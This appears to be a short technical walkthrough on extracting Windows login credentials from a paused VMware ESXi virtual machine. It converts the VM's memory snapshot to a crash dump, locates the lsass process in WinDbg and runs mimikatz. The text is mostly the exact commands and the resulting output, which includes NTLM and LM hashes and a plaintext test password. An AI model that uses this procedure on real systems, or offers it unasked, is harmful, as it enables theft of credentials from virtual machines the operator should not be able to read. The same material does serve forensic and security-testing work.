[VM]Get Password from Virtual Machine Memory

Env.

Virtual Machine

Target VM : win7x86 ( Build 7600) Based on ESXi 5.0
Process VM : Windows 7 SP1 x86 Build 7601

Tools

Name Version vmss2core-Linux64 January 13, 2017 v1.0.1 WinDbg 6.11.0001.404 x86 WinSCP 5.9.3 Build 7136 mimilib.dll win32 from mimikatz_trunk2.1 20160229

Step

Get dmp file

1. Pause the Running Target VM.
2. Copy vmss2core-Linux64 to ESXi (/vmfs/volumes/…/win7x86/) with WinSCP.
3. Use vmss2core to convert win7x86-xxx.vmss into a dmp file(memory.dmp).
4. Copy memory.dmp to Process VM (c:/vmss/) with WinSCP.

/vmfs/volumes/589af095-50718614-d536-005056881c2e/win7x86 # ./vmss2core-Linux64 -W7600 "win7x86-bfdbf0ed.vmss"vmss2core version 8437677 Copyright (C) 1998-2017 VMware, Inc. All rights reserved.Win32: found DDB at PA 0x2779be8Win32: MmPfnDatabase=0x827b9700Win32: PsLoadedModuleList=0x82799810Win32: PsActiveProcessHead=0x82791e98Win32: KiBugcheckData=0x827b1a00Win32: KernBase=0x82651000Win32: NtBuildLab=0x826a1068CoreDumpScanWin32: MinorVersion set to 7600... 10 MBs written.... 20 MBs written.... 30 MBs written....... 1010 MBs written.... 1020 MBs written.Finished writing core.

Locate lsass process

1. Load the dump file into WinDbg (File -> Open Crash Dump).
2. Load symbols by following command.
3. Locate and Switch lsass process by following command.

kd> .sympath SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbolsSymbol search path is: SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbolsExpanded Symbol search path is: srv*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbolskd> .reloadLoading Kernel Symbols...................................................Loading User Symbols...................................................Loading unloaded module list......*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll - 

kd> !process 0 0 lsass.exePROCESS 85d37a68  SessionId: 0  Cid: 0204    Peb: 7ffd8000  ParentCid: 0194    DirBase: 3eab20e0  ObjectTable: 96371e60  HandleCount: 564.    Image: lsass.exekd> .process /r /p 85d37a68Implicit process is now 85d37a68Loading User Symbols..............................................................

Get password

1. Load the mimilib.dll file.
2. Run mimikatz.

kd> .load C:\vmss\mimilib.dll  .#####.   mimikatz 2.0 alpha (x86) built on Feb 29 2016 03:03:51 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 7600 ## / \ ##  /* * * ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)  '#####'                                  WinDBG extension ! * * */===================================#         * Kernel mode *         #===================================# Search for LSASS process0: kd> !process 0 0 lsass.exe# Then switch to its context0: kd> .process /r /p <EPROCESS address># And finally :0: kd> !mimikatz===================================#          * User mode *          #===================================0:000> !mimikatz===================================

kd> !mimikatzDPAPI Backup keys=================Current prefered key:       Compatibility prefered key: SekurLSA========Authentication Id : 0 ; 618511 (00000000:0009700f)Session           : Interactive from 1User Name         : WIN7X86ENDomain            : WIN7X86EN-PCLogon Server      : WIN7X86EN-PCLogon Time        : 2/24/2017 1:19:20 AMSID               : S-1-5-21-2794451615-1102251730-2481481344-1000    msv :      [00000003] Primary     * Username : WIN7X86EN     * Domain   : WIN7X86EN-PC     * LM       : 16a5d217f7c9c7befdcfc2afb2d1be34     * NTLM     : a91a49a72e7cf292cdad1bffdead9fd3     * SHA1     : e4496b25c5afb22a92d28dadecb7d5873e920b6e    tspkg :      * Username : WIN7X86EN     * Domain   : WIN7X86EN-PC     * Password : mypassword    wdigest :      * Username : WIN7X86EN     * Domain   : WIN7X86EN-PC     * Password : mypassword    kerberos :      * Username : WIN7X86EN     * Domain   : WIN7X86EN-PC     * Password : mypassword     * Key List       aes256_hmac       <no size, buffer is incorrect>       aes128_hmac       <no size, buffer is incorrect>       rc4_hmac_nt       a91a49a72e7cf292cdad1bffdead9fd3       rc4_hmac_old      a91a49a72e7cf292cdad1bffdead9fd3       rc4_md4           a91a49a72e7cf292cdad1bffdead9fd3       rc4_hmac_nt_exp   a91a49a72e7cf292cdad1bffdead9fd3       rc4_hmac_old_exp  a91a49a72e7cf292cdad1bffdead9fd3    ssp :     masterkey :     credman : 

Refer

Mimikatz Against Virtual Machine Memory Part 1
Mimikatz Against Virtual Machine Memory Part 2